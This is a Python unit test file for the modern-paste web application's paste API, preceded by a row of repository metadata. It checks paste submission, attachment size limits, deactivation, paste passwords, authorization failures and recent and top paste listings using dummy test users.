| 37.567921 | 80 | 0.537031 | 2,584 | 22,954 | 4.458978 | 0.091718 | 0.065614 | 0.041659 | 0.012498 | 0.863652 | 0.853758 | 0.851415 | 0.84369 | 0.839004 | 0.827027 | 0 | 0.012518 | 0.377058 | 22,954 | 610 | 81 | 37.629508 | 0.793272 | 0.107127 | 0 | 0.846547 | 0 | 0 | 0.059965 | 0.019047 | 0 | 0 | 0 | 0 | 0.015345 | 1 | 0.048593 | false | 0.025575 | 0.012788 | 0 | 0.094629 | 0.040921 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
adda09b2999a9f99515d8b32286adda17e0d5a48 | 41,277 | py | Python | tests/test_api/test_paste.py | cipherboy/modern-paste | ecc4168bda2a9e5981d495f9e0538258d9f727a2 | [
"MIT"
] | 271 | 2016-02-03T03:09:25.000Z | 2021-12-12T02:21:03.000Z | tests/test_api/test_paste.py | cipherboy/modern-paste | ecc4168bda2a9e5981d495f9e0538258d9f727a2 | [
"MIT"
] | 65 | 2016-02-03T07:20:16.000Z | 2019-01-09T00:10:10.000Z | tests/test_api/test_paste.py | cipherboy/modern-paste | ecc4168bda2a9e5981d495f9e0538258d9f727a2 | [
"MIT"
] | 64 | 2016-02-03T17:08:32.000Z | 2021-05-23T08:48:22.000Z | # coding=utf-8
import json
import random
import time
import mock
from sqlalchemy.exc import SQLAlchemyError
import config
import constants.api
import database.attachment
import database.paste
import database.user
import util.cryptography
import util.testing
from uri.authentication import *
from uri.main import *
from uri.paste import *
class TestPaste(util.testing.DatabaseTestCase):
def test_submit_paste_invalid(self):
# Invalid input
resp = self.client.post(
PasteSubmitURI.uri(),
data=json.dumps({}),
content_type='application/json',
)
self.assertEqual(resp.status_code, constants.api.INCOMPLETE_PARAMS_FAILURE_CODE)
self.assertEqual(json.loads(resp.data), constants.api.INCOMPLETE_PARAMS_FAILURE)
def test_submit_paste_login_required(self):
# Config requires authentication to post paste
config.REQUIRE_LOGIN_TO_PASTE = True
resp = self.client.post(
PasteSubmitURI.uri(),
data=json.dumps({
'contents': 'paste',
}),
content_type='application/json',
)
self.assertEqual(constants.api.UNAUTHENTICATED_PASTES_DISABLED_FAILURE_CODE, resp.status_code)
self.assertEqual(constants.api.UNAUTHENTICATED_PASTES_DISABLED_FAILURE, json.loads(resp.data))
user = util.testing.UserFactory.generate()
resp = self.client.post(
PasteSubmitURI.uri(),
data=json.dumps({
'contents': 'paste',
'api_key': user.api_key,
}),
content_type='application/json',
)
self.assertEqual(constants.api.SUCCESS_CODE, resp.status_code)
def test_submit_paste_no_auth(self):
# Successful paste without authentication
resp = self.client.post(
PasteSubmitURI.uri(),
data=json.dumps({
'contents': 'contents',
}),
content_type='application/json',
)
self.assertEqual(resp.status_code, constants.api.SUCCESS_CODE)
resp_data = json.loads(resp.data)
self.assertIsNotNone(resp_data['post_time'])
self.assertIsNotNone(resp_data['paste_id_repr'])
self.assertTrue(resp_data['is_active'])
self.assertEquals('contents', resp_data['contents'])
self.assertIsNotNone(resp_data['deactivation_token'])
resp = self.client.post(
PasteSubmitURI.uri(),
data=json.dumps({
'contents': 'contents',
'user_id': 1,
}),
content_type='application/json',
)
self.assertEqual(resp.status_code, constants.api.SUCCESS_CODE)
resp_data = json.loads(resp.data)
self.assertIsNotNone(resp_data['post_time'])
self.assertIsNotNone(resp_data['paste_id_repr'])
self.assertTrue(resp_data['is_active'])
self.assertEquals('contents', resp_data['contents'])
self.assertIsNone(database.paste.get_paste_by_id(1).user_id)
def test_submit_paste_logged_in(self):
# Paste should automatically be associated with user who is logged in
user = util.testing.UserFactory.generate(username='username', password='password')
resp = self.client.post(
LoginUserURI.uri(),
data=json.dumps({
'username': 'username',
'password': 'password',
}),
content_type='application/json',
)
self.assertEquals(resp.status_code, constants.api.SUCCESS_CODE)
resp = self.client.post(
PasteSubmitURI.uri(),
data=json.dumps({
'contents': 'contents',
}),
content_type='application/json',
)
self.assertEqual(resp.status_code, constants.api.SUCCESS_CODE)
resp_data = json.loads(resp.data)
self.assertIsNotNone(resp_data['post_time'])
self.assertIsNotNone(resp_data['paste_id_repr'])
self.assertTrue(resp_data['is_active'])
self.assertEquals('contents', resp_data['contents'])
self.assertIsNotNone(resp_data['deactivation_token'])
self.assertEqual(user.user_id, database.paste.get_paste_by_id(util.cryptography.get_decid(resp_data['paste_id_repr'])).user_id)
def test_submit_paste_api_post(self):
# Ensure that the is_api_post flag is appropriately set
resp = self.client.post(
PasteSubmitURI.uri(),
data=json.dumps({
'contents': 'contents',
}),
content_type='application/json',
)
self.assertEqual(resp.status_code, constants.api.SUCCESS_CODE)
paste_id = util.cryptography.get_decid(json.loads(resp.data)['paste_id_repr'], force=True)
self.assertTrue(database.paste.get_paste_by_id(paste_id).is_api_post)
def test_submit_paste_non_api_post(self):
for referrer in [PastePostInterfaceURI.full_uri(), HomeURI.full_uri(), PastePostInterfaceURI.full_uri() + '/?extra=stuff']:
resp = self.client.post(
PasteSubmitURI.uri(),
data=json.dumps({
'contents': 'contents',
}),
content_type='application/json',
headers={
'referer': referrer, # TIL "referer" is a deliberate misspelling of "referrer"
},
)
self.assertEqual(resp.status_code, constants.api.SUCCESS_CODE)
paste_id = util.cryptography.get_decid(json.loads(resp.data)['paste_id_repr'], force=True)
self.assertFalse(database.paste.get_paste_by_id(paste_id).is_api_post)
def test_submit_paste_non_ascii(self):
resp = self.client.post(
PasteSubmitURI.uri(),
data=json.dumps({
'contents': '어머',
}),
content_type='application/json',
)
self.assertEqual(resp.status_code, constants.api.SUCCESS_CODE)
resp = self.client.post(
PasteDetailsURI.uri(),
data=json.dumps({
'paste_id': json.loads(resp.data)['paste_id_repr'],
}),
content_type='application/json',
)
self.assertEqual(resp.status_code, constants.api.SUCCESS_CODE)
self.assertEqual(json.loads(resp.data)['details']['contents'], unicode('어머', 'utf8'))
def test_submit_paste_attachments_disabled(self):
config.ENABLE_PASTE_ATTACHMENTS = False
resp = self.client.post(
PasteSubmitURI.uri(),
data=json.dumps({
'contents': 'contents',
'attachments': [
{
'name': 'file name',
'size': 12345,
'mime_type': 'image/png',
'data': 'binary data',
}
]
}),
content_type='application/json',
)
self.assertEqual(constants.api.PASTE_ATTACHMENTS_DISABLED_FAILURE_CODE, resp.status_code)
self.assertEqual(constants.api.PASTE_ATTACHMENTS_DISABLED_FAILURE, json.loads(resp.data))
def test_submit_paste_with_attachments(self):
with mock.patch.object(database.attachment, '_store_attachment_file') as mock_store_attachment_file:
resp = self.client.post(
PasteSubmitURI.uri(),
data=json.dumps({
'contents': 'contents',
'attachments': [
{
'name': 'file name',
'size': 12345,
'mime_type': 'image/png',
'data': 'binary data',
},
{
'name': 'file name 2',
'size': 12345,
'mime_type': 'image/png',
'data': 'binary data 2',
}
]
}),
content_type='application/json',
)
self.assertEqual(constants.api.SUCCESS_CODE, resp.status_code)
self.assertEqual(2, mock_store_attachment_file.call_count)
resp_data = json.loads(resp.data)
self.assertEqual('file_name', resp_data['attachments'][0]['name'])
self.assertEqual(12345, resp_data['attachments'][0]['size'])
self.assertEqual('image/png', resp_data['attachments'][0]['mime_type'])
self.assertIsNotNone(database.attachment.get_attachment_by_name(
util.cryptography.get_decid(resp_data['paste_id_repr']),
'file_name')
)
self.assertEqual('file_name_2', resp_data['attachments'][1]['name'])
self.assertEqual(12345, resp_data['attachments'][1]['size'])
self.assertEqual('image/png', resp_data['attachments'][1]['mime_type'])
self.assertIsNotNone(database.attachment.get_attachment_by_name(
util.cryptography.get_decid(resp_data['paste_id_repr']),
'file_name_2')
)
def test_submit_paste_invalid_attachments(self):
with mock.patch.object(database.attachment, '_store_attachment_file') as mock_store_attachment_file:
resp = self.client.post(
PasteSubmitURI.uri(),
data=json.dumps({
'contents': 'contents',
'attachments': [
{
'name': 'file name',
}
]
}),
content_type='application/json',
)
self.assertEqual(constants.api.SUCCESS_CODE, resp.status_code)
self.assertEqual(1, mock_store_attachment_file.call_count)
def test_submit_paste_too_large(self):
config.MAX_ATTACHMENT_SIZE = 10.0 / (1000 * 1000) # 10 B
with mock.patch.object(database.attachment, '_store_attachment_file'):
resp = self.client.post(
PasteSubmitURI.uri(),
data=json.dumps({
'contents': 'contents',
'attachments': [
{
'name': 'file name',
'size': 12345,
'mime_type': 'image/png',
'data': util.testing.random_alphanumeric_string(length=20),
},
]
}),
content_type='application/json',
)
self.assertEqual(constants.api.PASTE_ATTACHMENT_TOO_LARGE_FAILURE_CODE, resp.status_code)
self.assertEqual(constants.api.PASTE_ATTACHMENT_TOO_LARGE_FAILURE, json.loads(resp.data))
resp = self.client.post(
PasteSubmitURI.uri(),
data=json.dumps({
'contents': 'contents',
'attachments': [
{
'name': 'file name',
'size': 12345,
'mime_type': 'image/png',
'data': util.testing.random_alphanumeric_string(length=5),
},
]
}),
content_type='application/json',
)
self.assertEqual(constants.api.SUCCESS_CODE, resp.status_code)
def test_submit_paste_base64_size_threshold(self):
config.MAX_ATTACHMENT_SIZE = 3.0 / (1000 * 1000) # 3 B
with mock.patch.object(database.attachment, '_store_attachment_file'):
resp = self.client.post(
PasteSubmitURI.uri(),
data=json.dumps({
'contents': 'contents',
'attachments': [
{
'name': 'file name',
'size': 12345,
'mime_type': 'image/png',
'data': util.testing.random_alphanumeric_string(length=5),
},
]
}),
content_type='application/json',
)
self.assertEqual(constants.api.PASTE_ATTACHMENT_TOO_LARGE_FAILURE_CODE, resp.status_code)
self.assertEqual(constants.api.PASTE_ATTACHMENT_TOO_LARGE_FAILURE, json.loads(resp.data))
resp = self.client.post(
PasteSubmitURI.uri(),
data=json.dumps({
'contents': 'contents',
'attachments': [
{
'name': 'file name',
'size': 12345,
'mime_type': 'image/png',
'data': util.testing.random_alphanumeric_string(length=4),
},
]
}),
content_type='application/json',
)
self.assertEqual(constants.api.SUCCESS_CODE, resp.status_code)
def test_submit_paste_server_error(self):
with mock.patch.object(database.paste, 'create_new_paste', side_effect=SQLAlchemyError):
resp = self.client.post(
PasteSubmitURI.uri(),
data=json.dumps({
'contents': 'contents',
}),
content_type='application/json',
)
self.assertEqual(resp.status_code, constants.api.UNDEFINED_FAILURE_CODE)
self.assertEqual(json.loads(resp.data), constants.api.UNDEFINED_FAILURE)
def test_deactivate_paste_invalid(self):
resp = self.client.post(
PasteDeactivateURI.uri(),
data=json.dumps({}),
content_type='application/json',
)
self.assertEqual(resp.status_code, constants.api.INCOMPLETE_PARAMS_FAILURE_CODE)
self.assertEqual(json.loads(resp.data), constants.api.INCOMPLETE_PARAMS_FAILURE)
resp = self.client.post(
PasteDeactivateURI.uri(),
data=json.dumps({
'paste_id': -1,
}),
content_type='application/json',
)
self.assertEqual(resp.status_code, constants.api.NONEXISTENT_PASTE_FAILURE_CODE)
self.assertEqual(json.loads(resp.data), constants.api.NONEXISTENT_PASTE_FAILURE)
def test_deactivate_paste_auth(self):
# Deactivate paste by being authenticated and owning the paste
user = util.testing.UserFactory.generate(username='username', password='password')
paste = util.testing.PasteFactory.generate(user_id=user.user_id)
resp = self.client.post(
PasteDeactivateURI.uri(),
data=json.dumps({
'paste_id': util.cryptography.get_id_repr(paste.paste_id),
}),
content_type='application/json',
)
self.assertEqual(resp.status_code, constants.api.AUTH_FAILURE_CODE)
resp = self.client.post(
LoginUserURI.uri(),
data=json.dumps({
'username': 'username',
'password': 'password',
}),
content_type='application/json',
)
self.assertEquals(resp.status_code, constants.api.SUCCESS_CODE)
resp = self.client.post(
PasteDeactivateURI.uri(),
data=json.dumps({
'paste_id': util.cryptography.get_id_repr(paste.paste_id),
}),
content_type='application/json',
)
self.assertEqual(resp.status_code, constants.api.SUCCESS_CODE)
self.assertFalse(database.paste.get_paste_by_id(paste.paste_id).is_active)
def test_deactivate_paste_api_key(self):
# Deactivate paste by authentication via an API key
user = util.testing.UserFactory.generate()
paste = util.testing.PasteFactory.generate(user_id=user.user_id)
resp = self.client.post(
PasteDeactivateURI.uri(),
data=json.dumps({
'paste_id': util.cryptography.get_id_repr(paste.paste_id),
'api_key': user.api_key,
}),
content_type='application/json',
)
self.assertEqual(constants.api.SUCCESS_CODE, resp.status_code)
self.assertFalse(database.paste.get_paste_by_id(paste.paste_id).is_active)
def test_deactivate_paste_token(self):
# Deactivate paste using deactivation token
paste = util.testing.PasteFactory.generate()
resp = self.client.post(
PasteDeactivateURI.uri(),
data=json.dumps({
'paste_id': util.cryptography.get_id_repr(paste.paste_id),
'deactivation_token': 'invalid',
}),
content_type='application/json',
)
self.assertEqual(resp.status_code, constants.api.AUTH_FAILURE_CODE)
resp = self.client.post(
PasteDeactivateURI.uri(),
data=json.dumps({
'paste_id': util.cryptography.get_id_repr(paste.paste_id),
'deactivation_token': paste.deactivation_token,
}),
content_type='application/json',
)
self.assertEqual(resp.status_code, constants.api.SUCCESS_CODE)
self.assertFalse(database.paste.get_paste_by_id(paste.paste_id).is_active)
def test_deactivate_paste_already_deactivated(self):
# Deactivate paste using deactivation token
paste = util.testing.PasteFactory.generate()
database.paste.deactivate_paste(paste.paste_id)
resp = self.client.post(
PasteDeactivateURI.uri(),
data=json.dumps({
'paste_id': util.cryptography.get_id_repr(paste.paste_id),
'deactivation_token': paste.deactivation_token,
}),
content_type='application/json',
)
self.assertEqual(constants.api.NONEXISTENT_PASTE_FAILURE_CODE, resp.status_code)
self.assertEqual(constants.api.NONEXISTENT_PASTE_FAILURE, json.loads(resp.data))
def test_deactivate_paste_server_error(self):
with mock.patch.object(database.paste, 'deactivate_paste', side_effect=SQLAlchemyError):
paste = util.testing.PasteFactory.generate()
resp = self.client.post(
PasteDeactivateURI.uri(),
data=json.dumps({
'paste_id': util.cryptography.get_id_repr(paste.paste_id),
'deactivation_token': paste.deactivation_token,
}),
content_type='application/json',
)
self.assertEqual(resp.status_code, constants.api.UNDEFINED_FAILURE_CODE)
self.assertEqual(json.loads(resp.data), constants.api.UNDEFINED_FAILURE)
def test_set_paste_password(self):
user = util.testing.UserFactory.generate(username='username', password='password')
self.api_login_user('username', 'password')
paste = util.testing.PasteFactory.generate(user_id=user.user_id)
old_password_hash = paste.password_hash
resp = self.client.post(
PasteSetPasswordURI.uri(),
data=json.dumps({
'paste_id': util.cryptography.get_id_repr(paste.paste_id),
'password': 'password',
}),
content_type='application/json',
)
self.assertEqual(constants.api.SUCCESS_CODE, resp.status_code)
self.assertNotEqual(database.paste.get_paste_by_id(paste.paste_id).password_hash, old_password_hash)
def test_set_paste_password_unauth(self):
# Modifying your own paste without authorization
user = util.testing.UserFactory.generate(username='username', password='password')
paste = util.testing.PasteFactory.generate(user_id=user.user_id)
resp = self.client.post(
PasteSetPasswordURI.uri(),
data=json.dumps({
'paste_id': util.cryptography.get_id_repr(paste.paste_id),
'password': 'password',
}),
content_type='application/json',
)
self.assertEqual(constants.api.AUTH_FAILURE_CODE, resp.status_code)
self.assertEqual('auth_failure', json.loads(resp.data)[constants.api.FAILURE])
def test_set_paste_password_invalid_auth(self):
# Modifying someone else's paste
user = util.testing.UserFactory.generate(username='username', password='password')
self.api_login_user('username', 'password')
paste = util.testing.PasteFactory.generate(user_id=user.user_id + 1)
resp = self.client.post(
PasteSetPasswordURI.uri(),
data=json.dumps({
'paste_id': util.cryptography.get_id_repr(paste.paste_id),
'password': 'password',
}),
content_type='application/json',
)
self.assertEqual(constants.api.AUTH_FAILURE_CODE, resp.status_code)
self.assertEqual('auth_failure', json.loads(resp.data)[constants.api.FAILURE])
def test_set_paste_password_nonexistent(self):
util.testing.UserFactory.generate(username='username', password='password')
self.api_login_user('username', 'password')
resp = self.client.post(
PasteSetPasswordURI.uri(),
data=json.dumps({
'paste_id': -1,
'password': 'password',
}),
content_type='application/json',
)
self.assertEqual(constants.api.NONEXISTENT_PASTE_FAILURE_CODE, resp.status_code)
self.assertEqual(constants.api.NONEXISTENT_PASTE_FAILURE, json.loads(resp.data))
def test_add_paste_password(self):
user = util.testing.UserFactory.generate(username='username', password='password')
self.api_login_user('username', 'password')
paste = util.testing.PasteFactory.generate(user_id=user.user_id, password=None)
self.assertIsNone(paste.password_hash)
resp = self.client.post(
PasteSetPasswordURI.uri(),
data=json.dumps({
'paste_id': util.cryptography.get_id_repr(paste.paste_id),
'password': 'password',
}),
content_type='application/json',
)
self.assertEqual(constants.api.SUCCESS_CODE, resp.status_code)
self.assertIsNotNone(database.paste.get_paste_by_id(paste.paste_id).password_hash)
def test_remove_paste_password(self):
user = util.testing.UserFactory.generate(username='username', password='password')
self.api_login_user('username', 'password')
paste = util.testing.PasteFactory.generate(user_id=user.user_id, password='password')
self.assertIsNotNone(paste.password_hash)
resp = self.client.post(
PasteSetPasswordURI.uri(),
data=json.dumps({
'paste_id': util.cryptography.get_id_repr(paste.paste_id),
'password': None,
}),
content_type='application/json',
)
self.assertEqual(constants.api.SUCCESS_CODE, resp.status_code)
self.assertIsNone(database.paste.get_paste_by_id(paste.paste_id).password_hash)
def test_set_paste_password_server_error(self):
with mock.patch.object(database.paste, 'set_paste_password', side_effect=SQLAlchemyError):
user = util.testing.UserFactory.generate(username='username', password='password')
self.api_login_user('username', 'password')
paste = util.testing.PasteFactory.generate(user_id=user.user_id)
resp = self.client.post(
PasteSetPasswordURI.uri(),
data=json.dumps({
'paste_id': util.cryptography.get_id_repr(paste.paste_id),
'password': 'password',
}),
content_type='application/json',
)
self.assertEqual(constants.api.UNDEFINED_FAILURE_CODE, resp.status_code)
self.assertEqual(constants.api.UNDEFINED_FAILURE, json.loads(resp.data))
def test_paste_details_invalid(self):
resp = self.client.post(
PasteDetailsURI.uri(),
data=json.dumps({}),
content_type='application/json',
)
self.assertEqual(resp.status_code, constants.api.INCOMPLETE_PARAMS_FAILURE_CODE)
self.assertEqual(json.loads(resp.data), constants.api.INCOMPLETE_PARAMS_FAILURE)
resp = self.client.post(
PasteDetailsURI.uri(),
data=json.dumps({
'paste_id': -1,
}),
content_type='application/json',
)
self.assertEqual(resp.status_code, constants.api.NONEXISTENT_PASTE_FAILURE_CODE)
self.assertEqual(json.loads(resp.data), constants.api.NONEXISTENT_PASTE_FAILURE)
def test_paste_details_no_password(self):
user = util.testing.UserFactory.generate(username='username')
paste = util.testing.PasteFactory.generate(password=None, user_id=user.user_id)
resp = self.client.post(
PasteDetailsURI.uri(),
data=json.dumps({
'paste_id': util.cryptography.get_id_repr(paste.paste_id),
}),
content_type='application/json',
)
self.assertEqual(resp.status_code, constants.api.SUCCESS_CODE)
paste_details = database.paste.get_paste_by_id(paste.paste_id).as_dict()
paste_details['poster_username'] = 'username'
paste_details['attachments'] = []
self.assertEqual(paste_details, json.loads(resp.data)['details'])
def test_paste_details_password(self):
user = util.testing.UserFactory.generate(username='username')
paste = util.testing.PasteFactory.generate(password='None', user_id=user.user_id)
resp = self.client.post(
PasteDetailsURI.uri(),
data=json.dumps({
'paste_id': util.cryptography.get_id_repr(paste.paste_id),
}),
content_type='application/json',
)
self.assertEqual(resp.status_code, constants.api.AUTH_FAILURE_CODE)
paste = util.testing.PasteFactory.generate(password='password', user_id=user.user_id)
resp = self.client.post(
PasteDetailsURI.uri(),
data=json.dumps({
'paste_id': util.cryptography.get_id_repr(paste.paste_id),
}),
content_type='application/json',
)
self.assertEqual(resp.status_code, constants.api.AUTH_FAILURE_CODE)
paste = util.testing.PasteFactory.generate(password='password', user_id=user.user_id)
resp = self.client.post(
PasteDetailsURI.uri(),
data=json.dumps({
'paste_id': util.cryptography.get_id_repr(paste.paste_id),
'password': 'invalid',
}),
content_type='application/json',
)
self.assertEqual(resp.status_code, constants.api.AUTH_FAILURE_CODE)
paste = util.testing.PasteFactory.generate(password='password', user_id=user.user_id)
resp = self.client.post(
PasteDetailsURI.uri(),
data=json.dumps({
'paste_id': util.cryptography.get_id_repr(paste.paste_id),
'password': 'password',
}),
content_type='application/json',
)
self.assertEqual(resp.status_code, constants.api.SUCCESS_CODE)
paste_details = database.paste.get_paste_by_id(paste.paste_id).as_dict()
paste_details['poster_username'] = 'username'
paste_details['attachments'] = []
self.assertEqual(paste_details, json.loads(resp.data)['details'])
def test_paste_details_anonymous(self):
paste = util.testing.PasteFactory.generate(password=None, user_id=None)
resp = self.client.post(
PasteDetailsURI.uri(),
data=json.dumps({
'paste_id': util.cryptography.get_id_repr(paste.paste_id),
}),
content_type='application/json',
)
self.assertEqual(constants.api.SUCCESS_CODE, resp.status_code)
self.assertEqual('Anonymous', json.loads(resp.data)['details']['poster_username'])
user = util.testing.UserFactory.generate(username='username')
paste = util.testing.PasteFactory.generate(password=None, user_id=user.user_id)
database.user.deactivate_user(user.user_id)
resp = self.client.post(
PasteDetailsURI.uri(),
data=json.dumps({
'paste_id': util.cryptography.get_id_repr(paste.paste_id),
}),
content_type='application/json',
)
self.assertEqual(constants.api.NONEXISTENT_PASTE_FAILURE_CODE, resp.status_code)
self.assertEqual(constants.api.NONEXISTENT_PASTE_FAILURE, json.loads(resp.data))
def test_paste_details_nonexistent(self):
resp = self.client.post(
PasteDetailsURI.uri(),
data=json.dumps({
'paste_id': util.cryptography.get_id_repr(1),
}),
content_type='application/json',
)
self.assertEqual(constants.api.NONEXISTENT_PASTE_FAILURE_CODE, resp.status_code)
self.assertEqual(constants.api.NONEXISTENT_PASTE_FAILURE, json.loads(resp.data))
def test_paste_details_inactive(self):
paste = util.testing.PasteFactory.generate(password=None, user_id=None)
database.paste.deactivate_paste(paste.paste_id)
resp = self.client.post(
PasteDetailsURI.uri(),
data=json.dumps({
'paste_id': util.cryptography.get_id_repr(paste.paste_id),
}),
content_type='application/json',
)
self.assertEqual(constants.api.NONEXISTENT_PASTE_FAILURE_CODE, resp.status_code)
self.assertEqual(constants.api.NONEXISTENT_PASTE_FAILURE, json.loads(resp.data))
def test_paste_details_expired(self):
paste = util.testing.PasteFactory.generate(password=None, user_id=None, expiry_time=int(time.time()) - 1000)
resp = self.client.post(
PasteDetailsURI.uri(),
data=json.dumps({
'paste_id': util.cryptography.get_id_repr(paste.paste_id),
}),
content_type='application/json',
)
self.assertEqual(constants.api.NONEXISTENT_PASTE_FAILURE_CODE, resp.status_code)
self.assertEqual(constants.api.NONEXISTENT_PASTE_FAILURE, json.loads(resp.data))
def test_paste_details_with_attachments(self):
paste = util.testing.PasteFactory.generate(password=None, user_id=None)
attachments = [
util.testing.AttachmentFactory.generate(paste_id=paste.paste_id).as_dict()
for _ in range(5)
]
resp = self.client.post(
PasteDetailsURI.uri(),
data=json.dumps({
'paste_id': util.cryptography.get_id_repr(paste.paste_id),
}),
content_type='application/json',
)
self.assertEqual(constants.api.SUCCESS_CODE, resp.status_code)
self.assertEqual(5, len(json.loads(resp.data)['details']['attachments']))
for attachment in attachments:
self.assertIn(attachment, json.loads(resp.data)['details']['attachments'])
def test_paste_details_server_error(self):
with mock.patch.object(database.paste, 'get_paste_by_id', side_effect=SQLAlchemyError):
paste = util.testing.PasteFactory.generate(password=None)
resp = self.client.post(
PasteDetailsURI.uri(),
data=json.dumps({
'paste_id': util.cryptography.get_id_repr(paste.paste_id),
}),
content_type='application/json',
)
self.assertEqual(resp.status_code, constants.api.UNDEFINED_FAILURE_CODE)
self.assertEqual(json.loads(resp.data), constants.api.UNDEFINED_FAILURE)
def test_pastes_for_user_unauthorized(self):
resp = self.client.post(
PastesForUserURI.uri(),
data=json.dumps({}),
content_type='application/json',
)
self.assertEqual(constants.api.AUTH_FAILURE_CODE, resp.status_code)
self.assertEqual(constants.api.AUTH_FAILURE, json.loads(resp.data))
def test_pastes_for_user_empty(self):
util.testing.UserFactory.generate(username='username', password='password')
self.api_login_user('username', 'password')
resp = self.client.post(
PastesForUserURI.uri(),
data=json.dumps({}),
content_type='application/json',
)
self.assertEqual(constants.api.SUCCESS_CODE, resp.status_code)
self.assertEqual([], json.loads(resp.data)['pastes'])
def test_pastes_for_user_no_inactive(self):
user = util.testing.UserFactory.generate(username='username', password='password')
self.api_login_user('username', 'password')
pastes = [util.testing.PasteFactory.generate(user_id=user.user_id).as_dict() for i in range(10)]
[database.paste.deactivate_paste(util.cryptography.get_decid(paste['paste_id_repr'], force=True)) for paste in pastes]
resp = self.client.post(
PastesForUserURI.uri(),
data=json.dumps({}),
content_type='application/json',
)
self.assertEqual(constants.api.SUCCESS_CODE, resp.status_code)
self.assertEqual(0, len(json.loads(resp.data)['pastes']))
def test_pastes_for_user_valid(self):
user = util.testing.UserFactory.generate(username='username', password='password')
self.api_login_user('username', 'password')
pastes = [util.testing.PasteFactory.generate(user_id=user.user_id).as_dict() for i in range(10)]
resp = self.client.post(
PastesForUserURI.uri(),
data=json.dumps({}),
content_type='application/json',
)
self.assertEqual(constants.api.SUCCESS_CODE, resp.status_code)
self.assertEqual(len(pastes), len(json.loads(resp.data)['pastes']))
for paste in json.loads(resp.data)['pastes']:
self.assertIn(paste, pastes)
def test_pastes_for_user_server_error(self):
user = util.testing.UserFactory.generate(username='username', password='password')
self.api_login_user('username', 'password')
for i in range(3):
util.testing.PasteFactory.generate(user_id=user.user_id)
with mock.patch.object(database.paste, 'get_all_pastes_for_user', side_effect=SQLAlchemyError):
resp = self.client.post(
PastesForUserURI.uri(),
data=json.dumps({}),
content_type='application/json',
)
self.assertEqual(constants.api.UNDEFINED_FAILURE_CODE, resp.status_code)
self.assertEqual(constants.api.UNDEFINED_FAILURE, json.loads(resp.data))
def test_recent_pastes_invalid(self):
resp = self.client.post(
RecentPastesURI.uri(),
data=json.dumps({}),
content_type='application/json',
)
self.assertEqual(constants.api.INCOMPLETE_PARAMS_FAILURE_CODE, resp.status_code)
self.assertEqual(constants.api.INCOMPLETE_PARAMS_FAILURE, json.loads(resp.data))
resp = self.client.post(
RecentPastesURI.uri(),
data=json.dumps({
'page_num': 0,
}),
content_type='application/json',
)
self.assertEqual(constants.api.INCOMPLETE_PARAMS_FAILURE_CODE, resp.status_code)
self.assertEqual(constants.api.INCOMPLETE_PARAMS_FAILURE, json.loads(resp.data))
def test_recent_pastes_no_results(self):
resp = self.client.post(
RecentPastesURI.uri(),
data=json.dumps({
'page_num': 0,
'num_per_page': 5,
}),
content_type='application/json',
)
self.assertEqual(constants.api.SUCCESS_CODE, resp.status_code)
self.assertEqual([], json.loads(resp.data)['pastes'])
resp = self.client.post(
RecentPastesURI.uri(),
data=json.dumps({
'page_num': 3,
'num_per_page': 5,
}),
content_type='application/json',
)
self.assertEqual(constants.api.SUCCESS_CODE, resp.status_code)
self.assertEqual([], json.loads(resp.data)['pastes'])
def test_recent_pastes_results(self):
pastes = []
for i in range(15):
with mock.patch.object(time, 'time', return_value=time.time() + random.randint(-10000, 10000)):
pastes.append(util.testing.PasteFactory.generate(expiry_time=None))
recent_pastes_sorted = map(
lambda paste: paste.as_dict(),
sorted(pastes, key=lambda paste: paste.post_time, reverse=True),
)
resp = self.client.post(
RecentPastesURI.uri(),
data=json.dumps({
'page_num': 0,
'num_per_page': 5,
}),
content_type='application/json',
)
self.assertEqual(constants.api.SUCCESS_CODE, resp.status_code)
self.assertEqual(recent_pastes_sorted[0:5], json.loads(resp.data)['pastes'])
def test_top_pastes_invalid(self):
resp = self.client.post(
TopPastesURI.uri(),
data=json.dumps({}),
content_type='application/json',
)
self.assertEqual(constants.api.INCOMPLETE_PARAMS_FAILURE_CODE, resp.status_code)
self.assertEqual(constants.api.INCOMPLETE_PARAMS_FAILURE, json.loads(resp.data))
resp = self.client.post(
TopPastesURI.uri(),
data=json.dumps({
'page_num': 0,
}),
content_type='application/json',
)
self.assertEqual(constants.api.INCOMPLETE_PARAMS_FAILURE_CODE, resp.status_code)
self.assertEqual(constants.api.INCOMPLETE_PARAMS_FAILURE, json.loads(resp.data))
def test_top_pastes_no_results(self):
resp = self.client.post(
TopPastesURI.uri(),
data=json.dumps({
'page_num': 0,
'num_per_page': 5,
}),
content_type='application/json',
)
self.assertEqual(constants.api.SUCCESS_CODE, resp.status_code)
self.assertEqual([], json.loads(resp.data)['pastes'])
resp = self.client.post(
TopPastesURI.uri(),
data=json.dumps({
'page_num': 3,
'num_per_page': 5,
}),
content_type='application/json',
)
self.assertEqual(constants.api.SUCCESS_CODE, resp.status_code)
self.assertEqual([], json.loads(resp.data)['pastes'])
def test_recent_pastes_server_error(self):
with mock.patch.object(database.paste, 'get_recent_pastes', side_effect=SQLAlchemyError):
resp = self.client.post(
RecentPastesURI.uri(),
data=json.dumps({
'page_num': 0,
'num_per_page': 5,
}),
content_type='application/json',
)
self.assertEqual(resp.status_code, constants.api.UNDEFINED_FAILURE_CODE)
self.assertEqual(json.loads(resp.data), constants.api.UNDEFINED_FAILURE)
def test_top_pastes_results(self):
pastes = [util.testing.PasteFactory.generate() for i in range(15)]
for paste in pastes:
for i in range(random.randint(0, 50)):
database.paste.increment_paste_views(paste.paste_id)
for page_num in range(3):
resp = self.client.post(
TopPastesURI.uri(),
data=json.dumps({
'page_num': page_num,
'num_per_page': 5,
}),
content_type='application/json',
)
self.assertEqual(5, len(json.loads(resp.data)['pastes']))
for i in range(4):
self.assertGreaterEqual(
json.loads(resp.data)['pastes'][i]['views'],
json.loads(resp.data)['pastes'][i + 1]['views']
)
resp = self.client.post(
TopPastesURI.uri(),
data=json.dumps({
'page_num': 3,
'num_per_page': 5,
}),
content_type='application/json',
)
self.assertEqual([], json.loads(resp.data)['pastes'])
def test_top_pastes_server_error(self):
with mock.patch.object(database.paste, 'get_top_pastes', side_effect=SQLAlchemyError):
resp = self.client.post(
TopPastesURI.uri(),
data=json.dumps({
'page_num': 0,
'num_per_page': 5,
}),
content_type='application/json',
)
self.assertEqual(resp.status_code, constants.api.UNDEFINED_FAILURE_CODE)
